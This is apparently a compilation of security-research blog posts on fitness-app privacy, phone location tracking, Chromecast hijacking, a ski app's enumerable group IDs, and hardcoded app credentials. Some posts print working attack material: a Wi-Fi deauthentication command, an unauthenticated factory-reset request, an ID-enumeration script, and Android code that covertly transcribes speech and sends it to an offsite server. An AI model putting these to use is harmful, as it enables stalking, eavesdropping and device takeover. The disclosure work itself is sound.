Does the app make you set a strong password, or is a password of ‘password’ possible? If weak passwords are allowed, it’s almost as bad as publishing everything about you on the public internet!

5. Predictable Session number (iterative/sequential)?
This looks at the website URLs to see if your activity sessions share similar numbers e.g.
run #1 has website.com/session/123,
run #2 has website.com/session/124,
run #3 has website.com/session/125 etc.
…using sequential sessions isn’t a great idea, as it makes guessing URLs incredibly easy.

6. Can Google Index your runs?
Are the website’s session URLs left open to search engine spiders, making them easier to find? This makes your personal data easier to find on the public internet.

7. EXIF data on uploaded images?
People upload photos of themselves and their runs. EXIF data in images gives unique identifying factors, sometimes including the GPS coordinates where they were taken and more.

8. Live Tracking Capability?
With nothing more than a little knowledge of the app, can the victim/user be followed in real-time?

Findings

Default privacy settings

MapMyRun

Fully Public: Maps are visible to everyone by default.

Can edit privacy settings via a tiny drop down box on activity feed.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Nike+

Private: Maps only visible to ‘friends’ by default.

Link to privacy policy on the main sign-up form (in the small text at the bottom), but no personal data awareness given.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Runkeeper

Private: Maps only visible to ‘friends’ by default.

Though defaults to sharing to social platforms including Facebook and Twitter.

When workout is complete, users have to use slider to indicate which platform they would like to share to.

Link to privacy policy on main sign-up form but no personal data awareness given.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Runtastic

Private: Maps only visible to ‘friends’ by default.

Notes and pictures can be viewed unauthenticated though – see Live Tracking Capability below for the vulnerability.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Strava

Fully Public: Maps visible to ‘everyone’ by default.

Have to select checkbox to restrict sharing of workout to private only. Requires this user interaction.

No messages/prompts to raise user awareness to risks surrounding sharing personal data.

Easily tailored privacy settings?

MapMyRun

No

Nike+

Yes

Runkeeper

No

Runtastic

No

Strava

Yes – an added extra: the ability to set privacy zones to hide your home/work address.

Is your data transmitted securely (SSL)?

MapMyRun

Yes

Nike+

Yes

Runkeeper

Yes

Runtastic

Yes

Strava

Yes

Password strength

MapMyRun

Allowed password of ‘password’

Nike+

Allowed password of ‘Password1’ – states password requirements

Runkeeper

Allowed password of ‘password’

Runtastic

Allowed password of ‘password’

Strava

Allowed password of ‘password’

Predictable Session number (iterative/sequential)?

MapMyRun

Yes

Nike+

No

Runkeeper

Yes

Runtastic

Yes

Strava

Yes

Can Google Index your runs?

MapMyRun

Yes: Example

Nike+

Yes – if workout is shared to social media platforms – requires user to select this – not default.
Example

Runkeeper

Yes – if map is made visible to everyone – requires user to select this.
Example

Runtastic

Yes: Example

Strava

Yes: Example

EXIF Data on uploaded images?

MapMyRun

No sensitive information leaked.
Image can be viewed unauth:
Example

Nike+

Image not directly uploaded to the Nike+ website. Can be shared to social media – potential for tampering there, so this couldn’t be reliably tested.

Runkeeper

No sensitive information leaked.
Image can be viewed unauth:
Example

Runtastic

No sensitive information leaked.
Image can be viewed unauth:
Example

Strava

No sensitive information leaked.
Image can be viewed unauth:
Example

Live Tracking Capability?

MapMyRun

Only on the paid version. You have to manually enable live tracking and only friends can view it. Can only see ‘local’ friends who are conducting live workouts through the mobile app. We tried a MitM attack on the app to see if we could extract a session identifier for the workout, but the application implements SSL pinning and jailbreak detection.

Nike+

Application doesn’t currently support live tracking, just the ability to share routes afterwards etc.

Runkeeper

Default permissions do not allow unauthenticated viewing of live maps. Have to be friends.

Runtastic

Free version supported. Live tracking enabled by default.
Vulnerability found: The live map is not secured when workout is in progress, only after the workout is completed. Issue now fixed.

Strava

Application doesn’t currently support live tracking. It seems the session number is generated when a workout is finished/completed. No way to currently track during workout.

Conclusion

App manufacturers want you to share your data with other users; that’s half the reason the app exists. It’s not surprising then that the apps tend to have very open default privacy settings, or bury them away. What is surprising is that associated web pages are crawlable by search engine spiders. When a user completes their workout each session is tagged with an identifier, and in many cases we inferred this identifier to be predictable due to the use of a sequential/iterative system.

In our research we used Google to find users and their historic workout data, as well as live workout information, all conveniently plotted on an interactive map. We’re unsure whether end users were aware that they were sharing their live location with the world. Given that most users appear to use a real name and profile picture, you can see how easy it would be for an attacker to build a thorough profile of a target and their location.

We also know that the apps do not force users to create complex passwords. If you want to add an extra layer of protection make sure you use a complex password even when the app does not require it. Use a long password and make sure you pad it using uppercase, numbers and non-alphanumeric characters as well.

Our concerns don’t end there though; the way people are using the apps is a personal safety issue. By browsing users and reading their message threads we found lots of examples of people looking for running buddies. No problem there, except that if these were dating websites people would be meeting first in a public place, not half way up a hill in the middle of nowhere.

Security flaw with Runtastic

When tracking a live run, privacy settings were not correctly applied to the activity. This meant that one could simply iterate through live sessions and track Runtastic users in real time. We tracked each other out on runs many times. It would be trivial to stalk a runner in real time.

We reported the security flaw to Runtastic privately in early 2015. The finding wasn’t acknowledged and we received a very generic response about privacy settings.
As the issue wasn’t fixed at the time, we decided not to publish, so as not to expose lone runners to stalking attacks.

The bug was quietly fixed in late 2015, though we were not notified and only realised when the technique no longer worked. Hence we have now published. We have logs, photographic and video evidence to prove it.

What should you do as a runner?

  • Do you really need to share your workouts? If not, don’t.
  • Don’t start tracking your workouts from your front door.
  • Make sure you check your privacy settings, both on the app in question, but also on any social media you are using to share workouts.
  • Don’t make your routine predictable, vary your times and routes.
  • If you must share your workouts, ensure you only share with people you know and trust. Do not make this information public.
  • Don’t share your workouts live. You don’t want to advertise your whereabouts.
  • Try to avoid running alone where possible, but if unavoidable let someone you trust know your route and how long you expect to be.

What should you do as an app manufacturer?

  • Enforce strong passwords
  • Construct website URLs in such a way that they can’t be enumerated
  • Set default privacy settings as “locked down”
  • Clearly show your users how to unlock those settings
  • Prevent search engine spidering of session pages with a simple robots.txt rule (see the example after this list)
  • Discuss personal safety in your messaging
  • Promote the above as another set of reasons why your app is better than the others
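
On the robots.txt point, a couple of lines is all it takes, assuming (as in the earlier example URLs) that workout pages live under a /session/ path:

 User-agent: *
 Disallow: /session/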

Why I think that U.S. house is hounded by phone trackers


After the BBC contacted us for comment on this story I thought it’d be useful and interesting to share the details that were omitted, as well as the reasoning behind some of my assumptions (none of which involve the Bermuda triangle BTW).

The consensus, here and on the original fusion.net article, was that this is probably down to a single non-GPS location service, such as WiFi fingerprinting or cell tower triangulation, placing these stolen phones at this location.

I tend to agree that this is the most likely explanation, with Wi-Fi the prime contender as it is cross-device and mobile-carrier independent.

So, what is likely to be going on here?

My theory, based on the very limited information available, is this (assuming all of these people looking for their phones have had them stolen or lost in the same or a similar location):

  1. Some little toerag is stealing people’s phones and taking them to the same location.
  2. That location has almost zero cell tower coverage – which is likely if it is rural.
  3. The location also has at least one broadcasting Wi-Fi device with a MAC/SSID that was previously installed or used at the address now being identified by the phones as their location.
  4. The phones cannot get a GPS fix, and cannot triangulate due to the lack of cell towers, so they fall back to using Wi-Fi location as the most accurate method they have available.
  5. When a phone does manage to get a cell tower connection, it uploads this location to the location servers.

Here’s the reasoning behind some of my assumptions

1. If people are turning up at your house looking for their phone, they live within a reasonable distance. This suggests that this is not people from all over the country/world being told that their phone is at your house. Also, if the police are willing to believe that the phone may be located in your house, as they seem to have at least once according to the article, then the ‘victims’ are also probably reasonably local, at least to a state level I would guess. I think this helps point towards a local thief, either of opportunity or specifically targeting cell phones.

2. If the Atlanta in question is the one in Idaho, rather than Georgia, then there are some very rural and hard-to-access places in that state, giving credence to the argument that cell tower triangulation would not be reliable, and that if the phones are kept indoors GPS would not be producing fixes that the phone is willing to use over a strong Wi-Fi signal.

3. The moved/stolen/reused Wi-Fi router is simply the explanation that best fits the facts available. Another explanation would be a Wi-Fi device near the phones’ actual location that has been uploaded to one of these location databases with bad location data.

4. I have actually seen a person’s location data hop around a map where a router has been relocated due to a house move, before the databases of the router’s location have had a chance to be updated.

5. It’s also possible that someone who steals phones might have stolen or reused a Wi-Fi router that may previously have been used at this address, and the StreetView van hasn’t driven past their Unabomber style mountain shack to correct the router’s location yet.

What can be done?

There is a lot of speculation here, as I’m sure you’ve noticed. The people with the information at hand to solve this mystery are Google and Apple, as they would have enough information in their logs to clear this up fairly easily. When a location is sent to their services, I would imagine the method used to fix the location is logged too. They would also have valuable location history data, which would serve to track the phone from its point of loss to its final reported position.

Are your phones listening to you?



Ever had a weird situation where you’ve been talking about something, then shortly after an advert pops up on your phone or web browser relating to something you just said? There’s enough anecdotal evidence to suggest that it could be going on, but we wanted to prove how possible and easy it was.

If you haven’t already seen our film on the BBC web site about mobile apps and other devices listening to you, it’s here http://www.bbc.com/news/technology-35639549.

The BBC came to us as they wanted to investigate the potential. Dave had a think about it and decided the easiest way would be to code up a rogue Android app that had permissions to the microphone.

Do users actually check the permissions when they install an app? Fairly unlikely, hence it would be easy to get an app on to a user’s phone that could listen.

Facebook, Twitter, Instagram and many other popular mobile apps have the ‘record audio’ permission. We’re not saying that they use it, but mic access is widespread.

We had some concerns about this though:

First, we suspected that battery use would be high when constantly listening to the mic and uploading the audio to a voice-to-text service. Actually, this turned out not to be the case.

Second, we were interested in ‘positive reinforcement’ – people often focus on the unusual, so coincidental advert displays could be presented as evidence of ‘snooping’.

Anyway, my colleague Dave wrote the app, we installed it on to our own phone, hooked it up to a service to convert the voice to text for us, and presented the results in real time on screen for the purposes of filming.

Was it rocket science? No, anyone with a modicum of Android or iOS coding skills could have done this.

It was just about proving a point: that it’s perfectly possible, and that numerous mobile apps could snoop on your conversations if they wanted to.

A few more technical details that didn’t make the film

The media stream of the phone had to be muted, to avoid it making sounds whilst recording.

Whilst we set keywords using the snooped voice text to try to generate custom adverts within the app, they didn’t actually work! We need to spend more time on this to get it fixed.

There’s one point where we’re are all struggling to speak through suppressing laughter. The voice recognition is pretty good, but not perfect. We were in pieces because Zoe (the BBC reporter) was recorded as saying this:

www.hackXXitup.com-access_log-20160228:x.x.x.x - - [23/Feb/2016:15:05:41 +0100] "GET /recorded/wheat+allergy+to+come+up+with+a+wet+dream HTTP/1.1" 404 312

No, she didn’t actually say that!

Conclusion

We can’t be certain that any apps are actually snooping on your speech, but it’s perfectly possible.

Loads of apps already have the required permission, and users generally blindly accept the permissions anyway.

The next step would be figuring out a way to review large numbers of apps in the stores to see if any are actually taking your voice data.

Should you be concerned? I’m certainly not overly worried about it, but if you do see an advert that relates to something unusual that you just said, do let me know.

BLN’s IoT Forum. What went down


We had a great time at the BLN IoT Security Forum yesterday, there was a stunning turnout and the audience made it an absolute pleasure.

So many vulnerable gadgets, where to start?


Ah, the perennially broken kids’ tablet.


…and everyone’s favourite, the not-so-smart kettle.


New Chromecast & Chromecast Audio. Have they fixed their hijacking issue?


Written in partnership with Minh-dat Lam.

Back in 2013 the first Chromecast was released, and shortly after, in 2014, it was successfully hacked.

This vulnerability was discovered by Bishop Fox and was titled “The Rickmote Controller: Hacking One Chromecast at a Time” http://www.bishopfox.com/blog/2014/07/rickmote-controller-hacking-one-chromecast-time/.
We wanted to see whether Google had addressed this security concern two years later in their new 2015 Chromecast and Chromecast Audio devices.

Chromecast Out The Box

Initially the Chromecast comes out of the box with an open WiFi connection for pairing:

[Image: the Chromecast’s default open setup network]
No change there!

We thought we’d have a look at what services were available on the Chromecast:

Nmap scan report for 192.168.255.249 (Default Chromecast AP Address)
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
8008/tcp open http
8009/tcp open ssl/ajp13?
Supported Server Cipher(s):
Accepted TLSv1 256 bits AES256-SHA
Accepted TLSv1 128 bits AES128-SHA
Accepted TLSv1 168 bits DES-CBC3-SHA
Accepted TLSv1 128 bits RC4-SHA
Accepted TLSv1 128 bits RC4-MD5
8873/tcp open dxspider?
8879/tcp open unknown (Online Source Code: https://android.googlesource.com/platform/system/bt/+/4cac544/btcore/src/counter.c)

We spotted comments in the online source code such as “Disable opening network debug ports for security reasons” which appears to relate to a debug service:

>nc -vvn 192.168.255.249 8879
(UNKNOWN) [192.168.255.249] 8879 (?) open
Welcome to counters
> help
help command unimplemented
> show
counter count registered:0

Google source code also mentions:
“By default, we open up to three TCP ports that are used for debugging purpose:

  • TCP port 8872 – used for forwarding btsnoop logs at real time (Note: the port is open only if “Bluetooth HCI snoop log” is enabled in the Developer options)
  • TCP port 8873 – used for HCI debugging
  • TCP port 8879 – used for debugging the Bluetooth counters”

Shouldn’t these be disabled for security reasons?

Chromecast Pairing process

Although there was an SSL service, the Chromecast appeared to function over clear text:

[Image: cleartext Chromecast traffic capture]

Since the pairing all happens over the default open WiFi network on the Chromecast, we thought: could we just intercept the WiFi key during the pairing process?

[Image: the captured pairing traffic]

Not the case! The client uses a public key to encrypt the WiFi password, which is then sent over the open WiFi.

[Image: the encrypted WiFi password in the pairing exchange]

Attacking the Chromecast again

After our initial review, we thought we would check the original vulnerability against the new versions released 2 years later.

The attack works by preventing a Chromecast from communicating with the internet. This can be performed through a disassociation attack (or any other way to prevent internet access to the Chromecast). When no internet connection is detected, the Chromecast starts a new open WiFi Access Point that allows unauthenticated configuration.

We initially started scanning, using tools such as Airmon-ng, for MAC addresses that belong to Google devices:

a4:77:33

or

fa:8f:ca

We then scanned for the MAC address of the Access Point that the Chromecast was connected to, and launched a disassociation attack:

aireplay-ng -0 1000 -a <AP MAC> -c <Chromecast MAC> wlan0

Now we just need to scan for the Chromecast’s new open Access Point. It would appear that Google has still not fixed this issue.

We can then connect to the Chromecast’s AP in setup mode and reconfigure the Chromecast with a set of POST requests we’ve captured or manually using the app.

We also noticed that it was possible to factory reset the device via an unauthenticated POST request. This could be sent from either the network that the Chromecast was connected to, or the setup WiFi network:

POST /setup/reboot HTTP/1.1
Origin: https://www.google.com
Content-Length: 16
Content-Type: application/json
Host: 192.168.255.249:8008
Connection: Keep-Alive
User-Agent: com.google.android.apps.chromecast.app/1.12.32 (Linux; U; Android 4.4.4; Nexus 4 Build/KTU84P)
{"params":"fdr"}
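
For reference, the same factory reset can be fired off with curl, using the values from the capture above:

 curl -X POST http://192.168.255.249:8008/setup/reboot \
      -H "Content-Type: application/json" \
      -H "Origin: https://www.google.com" \
      -d '{"params":"fdr"}'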

Although we saw requests with a device ID, this was not required as a layer of authentication to factory reset the device.

POST 192.168.2.147:8008/setup/get_app_device_id
~~~CUT~~~
{"app_id":"E8C28D3C"}

Now what?

With access to the setup network, or the device in a factory-reset state, it would be possible to connect the Chromecast to the attacker’s network and stream arbitrary content to the user’s screen. Anywhere that the Chromecast’s WiFi network extends to is vulnerable to this attack. It would be trivial to play content on your neighbour’s Chromecast within minutes. One notable feature of the Chromecast is the ability to switch on a television when content starts playing. This makes the attack particularly effective.

Conclusion

We understand that the Chromecast reverts to a “Setup” mode when it cannot detect a network, which is designed for transportability. However, we don’t understand why there is no “reset” or “sync” style button on the devices that would safely revert them to “Setup” mode instead. The device already has a button that could be used for this feature.

Surely this is a simple fix to prevent the de-authentication style hijacking attacks?

Apps and Après. Skiing and privacy


Co-written with Chris Pritchard.

ski-app-privacy.fw

We were recently researching a job lot of ski and snow sport related hardware and software and discovered one app (of the many we reviewed) that gave us cause for concern.

In this particular case the vendor was helpful. There was no need to disclose it publicly as they had applied a fix within 48 hours of us contacting them.

However, there are useful lessons for everyone from our research, so here’s the anonymised version of our findings.

What we found

The app's main function was route tracking, so we were in familiar territory already.

Those oh-so common issues. As with many, many apps this one suffered from the usual glut of basic flaws:

  • The email used to sign up wasn't verified anywhere, so you could use anyone's address.
  • It allowed simple (read: easily crackable) passwords of 6 characters or more, so "password" or "123456" could be used, for example.
  • It did use HTTPS, BUT if you requested information over clear-text HTTP the server returned it in the clear too, so you could read sensitive info such as an email address.
  • Although the application supported SSL, it did not validate the server identity, leaving it vulnerable to MitM attacks. For this attack to succeed the attacker would need to be geographically close (i.e. within Wi-Fi range).

Now for some interesting issues

The app also had a group tracking functionality, so that users within a defined group of ski friends could see where the others were in real time with a map display. Pretty cool, easy to find out where your friends are without expensive ‘which piste are you on’ phone calls whilst roaming.

Wrong (you knew that was coming). When you create a group for your friends to join you can call it whatever you like. However, to add friends to the group, the group creator passes them a unique 5 digit reference generated by the app. Uh oh…

The 5 digit group ID is generated server side. 100,000 combinations doesn't sound like a lot of entropy, does it? Likely enough to cater for lots of skiing groups, but not enough to defend against a brute force or enumeration attack to discover valid group IDs. At even 50 requests per second, the entire keyspace can be swept in a little over half an hour.

Once you’ve got a valid group ID, submit it in a POST request to the API and you can get information about the members of that group.

Worse, we found that with that POST request you could get every group member’s long/lat location information, in real time. You could also see when they’d created their account as well as when they’d joined the group. Their email address was disclosed too. Also, if they’d signed in with their Facebook account it returned their public Facebook ID so you could find their public Facebook page.
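
To show how little effort the enumeration takes, here's a hypothetical sketch; the endpoint URL and parameter name are invented stand-ins for the (anonymised) real API:

import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;

public class GroupIdSweep {
    public static void main(String[] args) throws Exception {
        // Walk the whole 5-digit keyspace against a hypothetical endpoint.
        for (int id = 0; id < 100000; id++) {
            String groupId = String.format("%05d", id);
            URL url = new URL("https://api.example-ski-app.com/group/members");
            HttpURLConnection conn = (HttpURLConnection) url.openConnection();
            conn.setRequestMethod("POST");
            conn.setDoOutput(true);
            conn.setRequestProperty("Content-Type", "application/json");
            byte[] body = ("{\"group_id\":\"" + groupId + "\"}")
                    .getBytes(StandardCharsets.UTF_8);
            try (OutputStream os = conn.getOutputStream()) {
                os.write(body);
            }
            // A 200 with a member list marks a live group worth recording.
            if (conn.getResponseCode() == 200) {
                System.out.println("Valid group: " + groupId);
            }
            conn.disconnect();
        }
    }
}

Even basic rate limiting on the server would have made this sweep far more painful.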

The icing on the cake was the app's persistence. If you didn't explicitly close the app down it would keep running in the background, long after you'd left the slopes. Maybe so long after that it'd give your location away days or weeks after you'd got back from holiday.

Here are some screenshots of us tracking ourselves unauthenticated using the above bug… on the way from the ski slopes to the pub in Meribel!

ski-app-privacy-map

Lessons that need to be learned

  • Use email address validation.
  • Where IDs need to be generated, do so with a cryptographically strong random source and enough length that they cannot be guessed or enumerated. Simple sequential or short numeric IDs are easily guessed (see the sketch after this list).
  • Implement certificate pinning.
  • Make it clear to users that the app continues to function unless explicitly closed down.
  • Developers should be careful about the information they send back to anonymous requests. E.g. sending back email addresses and Facebook IDs. This could be a violation of the Data Protection Act.
  • Use secure session management within your application. Ensure that only authorised users can make requests for specific groups.
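
On the ID-generation point, here's a minimal sketch using Java's SecureRandom; the token length and alphabet are arbitrary choices:

import java.security.SecureRandom;

public class GroupIdGenerator {
    // 32-symbol alphabet with look-alike characters (0/O, 1/I) removed.
    private static final char[] ALPHABET =
            "ABCDEFGHJKLMNPQRSTUVWXYZ23456789".toCharArray();
    private static final SecureRandom RNG = new SecureRandom();

    // 12 characters over 32 symbols gives 32^12 ≈ 2^60 possibilities,
    // which makes blind enumeration hopeless compared with 100,000.
    public static String newGroupId() {
        StringBuilder sb = new StringBuilder(12);
        for (int i = 0; i < 12; i++) {
            sb.append(ALPHABET[RNG.nextInt(ALPHABET.length)]);
        }
        return sb.toString();
    }
}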

How we made the listening-in Android app


DIYbaddroidteeth

You may have seen us on the BBC recently, showing how a mobile device can be used to snoop on you. I created an Android app to surreptitiously listen in to conversations near the device and send them to an offsite server as pure text.

We’ve had a few questions asking how we put the app together, so here’s an explanation so that you can do it yourself.

CAVEAT: We were under significant time pressure to get the app ready for a filming date, so it's very hacked together. It's far from a perfect app!

How it works

I went for a quick mock-up to prove that it was possible to actually write an app that would listen in. I took some things for granted:

  1. The user would accept any requested permissions, because as shown by Facebook, they do if they think the content is worth it.
  2. The app can work in the foreground. It is possible to get this to work in the background but I was running out of time. This isn’t too much of a stretch; lots of people have apps that run constantly in the foreground (e.g. a recipe app in the kitchen).

The basic flow is: the app initialises, displays a screen, then sets up an instance of Android's SpeechRecognizer class; whenever a result comes back, it is sent off site.

Doesn’t sound too difficult does it?

So, I loaded up Android Studio and created the app: ptp.unacceptablebehaviour. Although most of the tests just had a simple text bar, for the final version we had one of our guys whip up a killer graphic:

ListenApp1

So, once it starts, it displays the image. Then it sets up a Google SpeechRecognizer object:

speech = SpeechRecognizer.createSpeechRecognizer(this);
speech.setRecognitionListener(this);
restartSR();

private void restartSR() {
    recognizerIntent = new Intent(RecognizerIntent.ACTION_RECOGNIZE_SPEECH);
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_PREFERENCE, "en");
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_CALLING_PACKAGE, this.getPackageName());
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL, RecognizerIntent.LANGUAGE_MODEL_WEB_SEARCH);
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_MAX_RESULTS, 3);
    speech.startListening(recognizerIntent);
}

I put the code that starts listening in a separate method so I could easily restart the speech recognition when it finished.
The Google speech recognition class works by setting up a listener which does all the hard work and then calls back at various points in its lifecycle; we hook into these, mainly for logging purposes. The essential calls are:

  • onReadyForSpeech – the listener is set up and is actively checking the microphone
  • onBeginningOfSpeech – the listener has heard something that sounds like speech and is recording it
  • onEndOfSpeech – the listener has noticed that the speech has stopped
  • onResults – called when the speech has been converted to text
  • onError – something went wrong

There's also an onPartialResults callback, which is designed for when the speech goes on for too long without a break. In testing this never got called.

In this case all I was really interested in was onResults, where we have the text string of what the phone has heard. It's here that we do our callback.

Again I took a lazy route for this. The quickest, easiest and dirtiest way of transferring a string somewhere is to make it into a web call and record it in the web log of a site that we control. It doesn't matter whether that call is to a valid URL, as long as it hits the web log.

As HTTP calls are common in Android apps, I just used the standard Java HttpUrlConnection class:

public void onResults(Bundle results) {
    Log.i(LOG_TAG, "onResults");
    ArrayList<String> matches = results
            .getStringArrayList(SpeechRecognizer.RESULTS_RECOGNITION);
    for (String result : matches) {
        try {
            String desturl = "http://xxxxxxxx.com/recorded/" + URLEncoder.encode(result, "UTF-8");
            Log.i(LOG_TAG, "Sending to " + desturl);
            URL url = new URL(desturl);
            HttpURLConnection connect = (HttpURLConnection) url.openConnection();
            connect.connect();
            InputStream in = new BufferedInputStream(connect.getInputStream());
            in.read();
            connect.disconnect();
        } catch (MalformedURLException e) {
            Log.i(LOG_TAG, "Malformed URL");
        } catch (IOException e) {
            Log.i(LOG_TAG, "IO Exception");
        } catch (Exception e) {
            Log.i(LOG_TAG, "Exception Type " + e.getMessage());
        }
    }
    restartSR();
}

So, if the speech recogniser picks up the phrase “unacceptable behaviour” it will convert this to:

http://xxxxxxxx.com/recorded/unacceptable+behaviour

The domain name has been redacted, not because I want to keep it secret; I was just running out of domain names to use, and this one had a swearword in it!

Here’s the device’s logfile:

03-22 12:11:28.634 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onReadyForSpeech
03-22 12:11:29.930 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onBeginningOfSpeech
03-22 12:11:33.636 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onEndOfSpeech
03-22 12:11:33.636 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Here
03-22 12:11:34.711 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onResults
03-22 12:11:34.719 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/unacceptable+behaviour
03-22 12:11:34.837 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.837 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/an+acceptable+behaviour
03-22 12:11:34.885 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.885 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/unacceptable+behaviours
03-22 12:11:34.937 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.937 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/and+acceptable+behaviour
03-22 12:11:34.988 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.989 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/acceptable+behaviour
03-22 12:11:35.029 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception

And then we can see the log on our webserver:

ListenApp2

Yeah, it’s clunky, but it works!

Some Problems

It’s not perfect and we found some problems whilst writing it which are explained below.

Permissions

The app needed quite a few permissions, and these might be enough to raise some red flags. The permissions I gave it in the end were:

  • MODIFY_AUDIO_SETTINGS – to allow the app to alter the volume – this is explained below
  • INTERNET – For SpeechRecognizer and to log the results
  • ACCESS_NETWORK_STATE – For SpeechRecognizer
  • RECORD_AUDIO – For SpeechRecognizer

In a later version I also stopped the screen going to sleep to make it easier to run in the demo.

These actually caused me more problems than first thought: my test Android device is a Nexus 5 running Android 6 (Marshmallow). Marshmallow was the first version of Android to officially allow the user to override app permissions, which caused me to repeatedly wonder why I was getting a "permission denied" message when, in fact, I had simply refused the permission!
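
For anyone hitting the same wall, the Marshmallow runtime-permission dance looks roughly like this; a sketch using the standard compat helpers, not the exact code from our app:

private static final int REQ_AUDIO = 1;

private void ensureAudioPermission() {
    // On Android 6+ the manifest entry alone is not enough; ask at runtime.
    if (ContextCompat.checkSelfPermission(this, Manifest.permission.RECORD_AUDIO)
            != PackageManager.PERMISSION_GRANTED) {
        ActivityCompat.requestPermissions(this,
                new String[]{Manifest.permission.RECORD_AUDIO}, REQ_AUDIO);
    } else {
        restartSR(); // already granted, start listening
    }
}

@Override
public void onRequestPermissionsResult(int requestCode, String[] permissions,
                                       int[] grantResults) {
    if (requestCode == REQ_AUDIO && grantResults.length > 0
            && grantResults[0] == PackageManager.PERMISSION_GRANTED) {
        restartSR();
    } else {
        Log.i(LOG_TAG, "RECORD_AUDIO refused by the user");
    }
}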

Audio Cues

Google's SpeechRecognizer plays two audio cues, one on onReadyForSpeech and the other on onEndOfSpeech. These cues cannot be overridden or changed. All I could do was mute the media audio stream that they are played on:

AudioManager am = (AudioManager) getSystemService(Context.AUDIO_SERVICE);
// ADJUST_MUTE belongs with adjustStreamVolume(); on API 23+ this mutes the media stream
am.adjustStreamVolume(AudioManager.STREAM_MUSIC, AudioManager.ADJUST_MUTE, 0);

On Marshmallow and Lollipop this is the Music stream; on earlier versions of Android it is the System stream.
Obviously, as I'm messing with the user's volume settings, this rather ruins the stealthiness. Using an alternative speech-to-text service could make this easier.

Battery Life

There will be an impact on battery life, although in testing the largest drain was the screen (as I was keeping the screen on full time) so this needs to be assessed with a proper background service.

Lock Screen

The lock screen stops the app listening whilst the phone is locked. It is possible to get around this using Android's "Daydream" screensaver feature, though this would require extra permissions and testing.

Serving Adverts

The last bit of the test was to see whether we could create custom adverts based on what it heard. So I plugged in Google’s AdView, and there I found the problem. AdView allows keywords to be added to ad requests but it doesn’t actually use them to serve adverts.

See, I even had the code to do it:

AdView adview = (AdView) findViewById(R.id.adView);
AdRequest adrequest = new AdRequest.Builder().addKeyword(matches.get(0)).build();
adview.loadAd(adrequest);

Back to the drawing board on this, or to use a different advertising provider.

Conclusions

It's easy enough to write an app that can listen in on you and convert what you say to text, even with just half a day of gluing random bits of code together.

There are some hurdles that need to be worked through to make this totally stealthy and to get the ad networks to respond.
It looks like Google’s taken the right steps with its SpeechRecognizer and AdView APIs.

Finally, the best defence is to allow user control over app permissions, something that should have been in Android a long time ago. The facility (the hidden App Ops interface) was in the OS as far back as Jelly Bean, but was removed in KitKat and Lollipop. Google really dropped the ball with this, and we should question why it took so long for such an effective defence to be implemented.

Another (un)smart Smarter app


unsmart

You might remember we looked at the hardware of the Smarter WiFi Coffee machine and found you could command it without adding it to your network or using the app. Accompanying the device was a new app – the Smarter app. This is a single app that covers both the iKettle 2.0 and the Coffee Machine.

I thought I would take a look at the app to see how it worked and if we could find any more juicy vulnerabilities like we found in the original WiFi kettle app.

Looking at the code of the Android version of the app, the first thing I noticed is that it is relatively small, with only a few classes:

unsmart1

The main bulk of the app is in the smarter classes.

unsmart2

Taking a quick look at the containers, I was immediately interested in the async container, as I wondered what might be leaving the app; it contained a couple of classes to do with home network scanning.

unsmart3

A quick glance at the 4 classes, and SendEmailBytes.class and SendEmailFile.class immediately caught my eye:

public static final String SENDGRID_PASSWORD = "******************************";
public static final String SENDGRID_USERNAME = "************";
private Context context;

Hang on a sec, isn't that a username and password stored in clear text in the application?! (I've obfuscated them for this post.)

And didn't I see a SendGrid container earlier, complete with a SendGrid class?

unsmart4

SendGrid is an SMTP email service used within applications for sending email. It has an API which can be used to send the email, and the API can be configured to be quite restricted in what it can do. In this case it seems Smarter didn't do this; they just opted to include their full SendGrid username and password.

This would allow anyone to view their account stats and who they have sent email to.

The latest version, 3.1.0 from 15 March 2016, fixes this bug.

Rather oddly, we looked at an earlier version of 3.1.0 which had the bug, but it has been updated on the Play Store without incrementing the version number.

Hence, you should uninstall and reinstall the app. Even if your phone states it has 3.1.0 installed, you need to reinstall from the Store!

Avoiding the issue

Remove the static credentials. Smarter really should look at using the API in the right way for this app. The SendGrid service does allow very granular control over what an API key can do, which limits the exposure, BUT if an application user can get hold of the API key they will be able to do whatever the app can – in this case, send email. Given that the key will be embedded in the application, essentially anyone who wants to can do this.

Secondly, and we have said this time and time again, implement some form of code obfuscation to prevent reverse engineering. It’s not going to fix the underlying issue, but it will make it harder for your API key to be accessed.

Even then, it could still be possible to obtain the key by performing a man-in-the-middle attack against the app if it doesn't validate the server's certificate, so thirdly: implement certificate pinning.
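
For illustration, pinning with OkHttp's CertificatePinner looks roughly like this; the hostname and pin are placeholders, not Smarter's real values:

import okhttp3.CertificatePinner;
import okhttp3.OkHttpClient;

public class PinnedClient {
    public static OkHttpClient create() {
        // Placeholder host and SHA-256 pin; substitute the real API host
        // and the hash of its certificate's public key.
        CertificatePinner pinner = new CertificatePinner.Builder()
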